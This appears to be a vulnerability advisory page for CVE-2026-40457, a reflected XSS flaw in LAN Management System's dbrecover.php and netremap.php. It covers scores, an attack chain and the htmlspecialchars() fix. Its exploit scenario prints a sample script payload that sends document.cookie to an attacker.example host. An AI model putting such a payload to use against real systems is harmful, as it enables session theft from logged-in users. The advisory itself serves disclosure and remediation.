Skip to main content

LAN Management System CVE-2026-40457

| EUVDEUVD-2026-37876 LOW
Cross-site Scripting (XSS) (CWE-79)
2026-06-18 CERT-PL GHSA-3vrh-xvg4-68rm
2.1
CVSS 4.0 · Vendor: CERT-PL

Severity by source

Vendor (CERT-PL) PRIMARY
2.1 LOW
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
6.1 MEDIUM

Attacker requires no authentication (PR:N), but victim must actively click a crafted link (UI:R); JavaScript executes in victim's browser scope (S:C) with low C/I impact and no server-side availability effect.

3.1 AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:P/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

Primary rating from Vendor (CERT-PL).

CVSS VectorVendor: CERT-PL

CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
A
Scope
X

Lifecycle Timeline

2
Source Code Evidence Fetched
Jun 18, 2026 - 12:35 vuln.today
Analysis Generated
Jun 18, 2026 - 12:35 vuln.today

DescriptionCVE.org

A Reflected Cross-Site Scripting (XSS) vulnerability exists in LMS (LAN Management System) before commit 9c5651b in the "dbrecover.php" and "netremap.php" modules where unsanitized GET parameters are directly embedded into HTML output. This allows an attacker to inject arbitrary JavaScript when an authenticated user clicks a crafted link, provided the required conditions (such as a network defined in the system) are met.

AnalysisAI

Reflected XSS in LAN Management System (LMS) before commit 9c5651b allows network-positioned attackers to inject arbitrary JavaScript into the browsers of authenticated LMS users by crafting malicious links targeting the dbrecover.php and netremap.php modules. The db, id, and mapto GET parameters were directly concatenated into HTML anchor elements without sanitization, as confirmed by the upstream commit diff. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Identify authenticated LMS administrator
Delivery
Craft malicious URL with XSS payload in db/id/mapto parameter
Exploit
Deliver link via phishing or social engineering
Install
Victim clicks link while authenticated to LMS
C2
Server reflects unsanitized parameter into HTML anchor
Execute
Arbitrary JavaScript executes in victim's browser session
Impact
Exfiltrate session cookie or perform privileged LMS actions

Vulnerability AssessmentAI

Exploitation Three concurrent conditions must be satisfied: (1) The victim must be an authenticated LMS user with access to the `dbrecover.php` or `netremap.php` modules - unauthenticated users are not a viable victim pool since these are internal management interfaces; (2) the victim must actively click a crafted, attacker-controlled URL (CVSS UI:A - no passive or drive-by exploitation path exists); (3) for the `netremap.php` vector specifically, at least one network must be defined in the LMS instance, as the module's confirmation flow - where the injection occurs - is only reachable when network objects exist (AT:P in CVSS 4.0). … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 4.0 base score of 2.1 (AV:N/AC:L/AT:P/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N) accurately reflects a low-severity finding despite the network-facing vector. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker identifies an LMS administrator and crafts a phishing link embedding a JavaScript payload in the `db` GET parameter targeting `dbrecover.php` - for example, appending `<script>document.location='https://attacker.example/steal?c='+document.cookie</script>` as the parameter value. When the authenticated administrator clicks the link, the LMS server reflects the unescaped parameter directly into the HTML response, causing the attacker's script to execute in the victim's browser session. …
Remediation Apply the upstream fix by updating LMS to a build incorporating commit 9c5651b (https://github.com/chilek/lms/commit/9c5651b39bfd086cc34fc9a78ddaa8c0815af114), which adds `htmlspecialchars()` escaping to all affected GET parameters in both `dbrecover.php` and `netremap.php`. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

More in PHP

View all
CVE-2012-1823 CRITICAL POC
9.8 May 11

sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not

CVE-2016-1555 CRITICAL POC
9.8 Apr 21

(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear

CVE-2024-11680 CRITICAL POC
9.8 Nov 26

ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C

CVE-2025-49113 CRITICAL POC
9.9 Jun 02

Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au

CVE-2017-9841 CRITICAL POC
9.8 Jun 27

Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c

CVE-2025-0108 HIGH POC
8.8 Feb 12

Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers

CVE-2021-25298 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2021-25296 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2013-4983 CRITICAL POC
10.0 Sep 10

The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows

CVE-2023-6553 CRITICAL POC
9.8 Dec 15

The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1

CVE-2024-46506 CRITICAL POC
10.0 May 13

NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro

CVE-2024-8353 CRITICAL POC
9.8 Sep 28

The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all

Share

CVE-2026-40457 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy